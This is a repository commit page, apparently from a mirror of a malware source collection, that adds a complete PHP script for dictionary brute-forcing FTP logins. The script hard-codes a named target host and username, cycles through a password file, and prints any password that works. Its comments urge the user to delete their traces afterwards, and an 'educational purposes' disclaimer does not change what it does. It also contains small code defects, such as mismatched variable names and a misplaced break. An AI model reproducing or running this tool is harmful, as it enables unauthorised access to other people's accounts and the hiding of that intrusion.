mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-16 15:59:24 +00:00
Rename HackTool.PHP.Brute.a to HackTool.PHP.BruteForce.c7
This commit is contained in:
vxunderground
GitHub
@@ -0,0 +1,81 @@
|
||||
<?php
|
||||
/*
|
||||
* This simple FTp brute forcer script is coded by
|
||||
* ^cybergang007^. I am in no way responsible for
|
||||
* any serious job you do with this piece of code.
|
||||
* Intended for educational purposes only.
|
||||
*
|
||||
* This bad script probes an FTP dictionary attack
|
||||
*
|
||||
* @Email : <soteres2002@greeknetizen.net>
|
||||
* @URL : http://www.greeknetizen.net/
|
||||
* @DESCTIPTION:
|
||||
* This PHP script tries a password
|
||||
* from the password file each time intil it finds it.
|
||||
* Execute it from a webpage on your server, not from
|
||||
* the command line(!). And remember to clear your
|
||||
* traces if you succeed in cracking the password
|
||||
* of the FTP account you desire. And once again,
|
||||
* I am not responsible for any of your actions
|
||||
* with this code.
|
||||
*/
|
||||
|
||||
error_reporting(E_PARSE); //we want any exception except from WARNING MESSAGES
|
||||
set_time_limit(0); // set the time limit for the script to +oo
|
||||
|
||||
$passwordfile = "passwd.dic"; //this is the path to the passwordfile
|
||||
$targethost = "www.bahoosh.net"; //change this to the host you want to attack
|
||||
$usrname = "bahoosh"; // change this to the username
|
||||
// of the FTP account you want
|
||||
// to attack
|
||||
$interval = 1; // this is the break the script each time it tries a password
|
||||
// do not set this to zero
|
||||
|
||||
//change the second arguments you desire
|
||||
$crh = "Sorry, the host you specified cannot be retrieved!";
|
||||
$cc = "<font color=\"red\">Sorry, I cannot connect to $targethost with <b>$username</b> and password: $trypassword</font><br>";
|
||||
|
||||
|
||||
/* DO NOT CHAGE ANYTHING BELOW THIS LINE UNLESS YOU REALLY KNOW WHAT YOU ARE DOING */
|
||||
|
||||
if(!file_exists($passwordfile)) {
|
||||
die("Sorry, the passwordfile <b>$passwordfile</b> cannot be retrieved");
|
||||
} else {
|
||||
// open connection funtion
|
||||
function openconnection($targethost,$username,$trypassword) {
|
||||
print "<hr>Trying password <b>$trypassword</b> for <b>".$username."</b> to $targethost<hr><br>";
|
||||
$ftp_conn = @ftp_connect($targethost) or print $crh;
|
||||
if($ftp_conn) {
|
||||
$trylogin = @ftp_login($ftp_conn,$username,$trypassword);
|
||||
if(!$trylogin) {
|
||||
print $cc;
|
||||
} else {
|
||||
print "<b><font color=\"red\">The password is: $trypassword</font></b><br>";
|
||||
@ftp_quit($ftp_conn);
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
//end of function
|
||||
|
||||
// try to open the password file
|
||||
$fp = @fopen($passwordfile,"r");
|
||||
if(!$fp) {
|
||||
die("The password file cannot open");
|
||||
} else {
|
||||
print "<b>The passwordfile is forked!</b>";
|
||||
//get the passwords
|
||||
while($trypassword = @fgets($fp,1024)) {
|
||||
openconnection($targethost,$usrname,$trypassword);
|
||||
sleep($interval);
|
||||
}
|
||||
}
|
||||
//...and close the password file or die of errors
|
||||
@fclose($fp) or die("\n<br>\nCannot close the password file!\n");
|
||||
echo "<b>The password file has closed";
|
||||
|
||||
}
|
||||
|
||||
// when you succeed connecting to your victim's server
|
||||
// do not forget to delete your traces
|
||||
?>
|
||||
Reference in New Issue
Block a user